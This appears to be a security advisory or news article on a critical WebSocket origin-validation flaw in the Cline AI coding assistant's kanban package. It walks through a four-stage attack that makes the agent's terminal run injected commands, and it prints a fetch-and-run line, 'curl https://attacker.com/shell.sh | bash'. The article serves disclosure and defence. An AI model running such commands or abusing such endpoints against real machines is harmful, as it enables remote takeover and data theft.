Critical Zero-Day Vulnerability in Cline AI: Remote Code Execution via WebSocket Origin Flaw
A significant security flaw has been uncovered in the Cline AI coding assistant, specifically within its bundled kanban npm package. This vulnerability creates a direct pathway for attackers to achieve Remote Code Execution (RCE), exfiltrate sensitive workspace data, and trigger Denial-of-Service (DoS) attacks — all triggered by a developer simply navigating to a malicious website in their browser.
The vulnerability, identified as CVE-2026-44211, was disclosed by security researcher Sagilayani. The core issue lies in the fact that the kanban CLI initializes a WebSocket server on the local loopback address (127.0.0.1:3484) without implementing any validation of the Origin header. This oversight allows external web entities to interact with local services as if they were the legitimate local UI.
With a CVSS v3.1 score of 9.3 (Critical), this flaw affects all versions of Cline prior to v2.13.0. As of this writing, a formal patch for the package has not yet been deployed.
The Anatomy of the Attack: Bypassing Browser Protections
To understand the severity, one must understand how WebSockets differ from standard HTTP requests. While browsers strictly enforce the Same-Origin Policy (SOP) and CORS to prevent malicious sites from reading data from other domains, WebSocket connections bypass these traditional protections during the initial handshake if the server does not explicitly validate the Origin header.
The attack vector follows a sophisticated four-stage execution chain:
- Information Exfiltration: An attacker-controlled webpage initiates a connection to
ws://127.0.0.1:3484/api/runtime/ws. Because there is no authentication, the server immediately transmits a comprehensive snapshot of the developer’s environment, including sensitive filesystem paths, Git metadata, and real-time AI chat logs. - Session Monitoring: By listening to
task_sessions_updatedevents, the attacker can monitor the developer’s workflow in real-time, identifying exactly when an AI agent becomes active and capturing its specific Task ID and Process ID (PID). - Terminal Hijacking & RCE: This is the most critical stage. The attacker connects to the
/api/terminal/ioendpoint. By injecting a malicious payload—such ascurl https://attacker.com/shell.sh | bash—followed by a carriage return, the attacker forces the AI agent to execute the command within the local shell context. - Service Disruption (DoS): Using the
/api/terminal/controlendpoint, an attacker can transmit a{"type": "stop"}message, silently killing active AI agent sessions and disrupting the developer’s productivity.
Root Cause Analysis
The vulnerability is a textbook intersection of two primary security weaknesses:
- CWE-306: Missing Authentication for a Critical Function. The endpoints responsible for terminal control and data streaming require zero credentials.
- CWE-1385: Missing Origin Validation in WebSockets. The server’s upgrade handler fails to verify if the incoming request is originating from a trusted local source.
This flaw is highly portable and platform-agnostic. Testing by the researcher confirmed successful exploitation across macOS, Linux, and Windows, utilizing major browser engines including Chrome, Firefox, and Arc.
Security Impact Summary
| Security Pillar | Impact Description |
|---|---|
| Confidentiality | High. Real-time leakage of workspace architecture, Git history, and private AI prompts. |
| Integrity | Critical. Arbitrary shell command execution allows for complete system compromise. |
| Availability | Medium/High. Ability to terminate critical developer workflows and agent processes. |
Recommended Mitigations
Until the Cline team releases a patched version of the kanban package, security professionals recommend the following defensive postures:
- Immediate Action: Avoid running the Cline kanban server in environments where you might visit untrusted or unverified websites.
- Proposed Fixes for Developers: The following architectural changes are necessary to remediate the flaw:
- Strict Origin Validation: Implement a whitelist that rejects any WebSocket upgrade request where the
Originheader does not matchlocalhostor127.0.0.1. - Token-Based Authentication: Generate a unique, high-entropy secret token at server startup and require it as a mandatory query parameter for all WebSocket handshakes.
- Endpoint Hardening: Implement robust authentication checks specifically for the
/api/terminal/endpoints to ensure only the legitimate UI can issue control commands.
- Strict Origin Validation: Implement a whitelist that rejects any WebSocket upgrade request where the
Stay vigilant: In the modern development lifecycle, our local tools are as much a part of the attack surface as our production code.